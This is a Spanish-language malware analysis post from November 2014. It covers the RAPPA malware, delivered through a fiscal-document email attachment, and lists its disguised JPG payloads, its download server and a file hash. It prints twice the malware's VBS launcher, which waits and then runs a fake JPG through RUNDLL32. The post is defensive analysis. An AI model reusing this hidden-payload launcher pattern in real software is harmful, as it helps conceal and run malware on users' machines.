Malware RAPPA que se crea a raiz de abrir un mail con adjunto "Documento-Fiscal.html"

---

Pues lo que inicialmente aparenta ser "solo" un BANLOAD, apoyado por estar escrito en portugués,

venir del Brasil y descargar, instalar y ejecutar el fichero Nota-Fiscal_26112014.exe que es

detectado inicialmente como un BANLOAD, como hemos informado esta mañana en nuestra Noticia al respecto, nos ha sorprendido con la creación de una carpeta particular dentro de C:\windows, en la que copia 6 ficheros JPG (que no son imagenes) , a saber:



eou15qt.jpg --> (es el start.jpg)

1clqu.jpg ----> (es el bho.jpg)

15z38ay6.jpg -> (es el xp.jpg)

ad9dirh.jpg --> (es el w7.jpg)

amz18pt.jpg --> (es el pro.jpg)

d6nctz1.jpg --> (es el mod.jpg)





Todo ello descargado desde este servidor de Alemania:



188.138.94.205 DE Germany, Europe 51, 9 PlusServer AG Plus





Ademas crea en el menu inicio un link (1zj7vc.lnk) que ejecuta un VBS (b6m10hh.vbs) que apoyado



por el RUNDLL32.EXE le permite ejecutar los indicados JPG (que no son tal):



Contenido del VBS



WScript.sleep 120000

strCommand = "RUNDLL32.eou15qt.jpg ExtractAndRun"

Set WshShell = WScript.CreateObject("WScript.Shell")

Set objExec = WshShell.Exec(strCommand)





Los nombres y ficheros indicados son los que nos ha creado, no necesariamente fijos.



Toda una historia, que suponemos aun no ha terminado...



De momento, con el ELISTARA 31.10 de hoy, detectamos y eliminamos carpeta y contenido de dicho

engendro, con lo que esperamos deshacer sus malas intenciones.







saludos



ms, 25-11-2014







NOTAS ADICIONALES SOBRE EL "b6m10hh.vbs" Y "*.jpg" INDICADAS EN COMENTARIOS DE VIRUSTOTAL:



SHA256: 65c3519a457dadaf82a10abe2bd067f1d2c8acea61afe62a30b58b1abb7ea087

Nombre: b6m10hh.vbs

Detecciones: 0 / 56

Fecha de análisis: 2014-11-26 13:49:12 UTC ( hace 0 minutos )





Parte del malware RAPPA



es un VBS que usa para ejecutar JPG que no son imagenes, segun este script:



WScript.sleep 120000

strCommand = "RUNDLL32 C:\WINDOWS\jbqy\eou15qt.jpg ExtractAndRun"

Set WshShell = WScript.CreateObject("WScript.Shell")

Set objExec = WshShell.Exec(strCommand)



controlado a partir de ELISTARA 31.10





______



*.JPG (PARTES DEL MALWARE RAPPA)



Solo el fichero ejecutable "Fiscal_26112014.exe" es detectado por virustotal como BANLOAD



Los demas ficheros, los 6 JPG, el VBS y demás, a horas de ahora no los detecta nadie.





ms.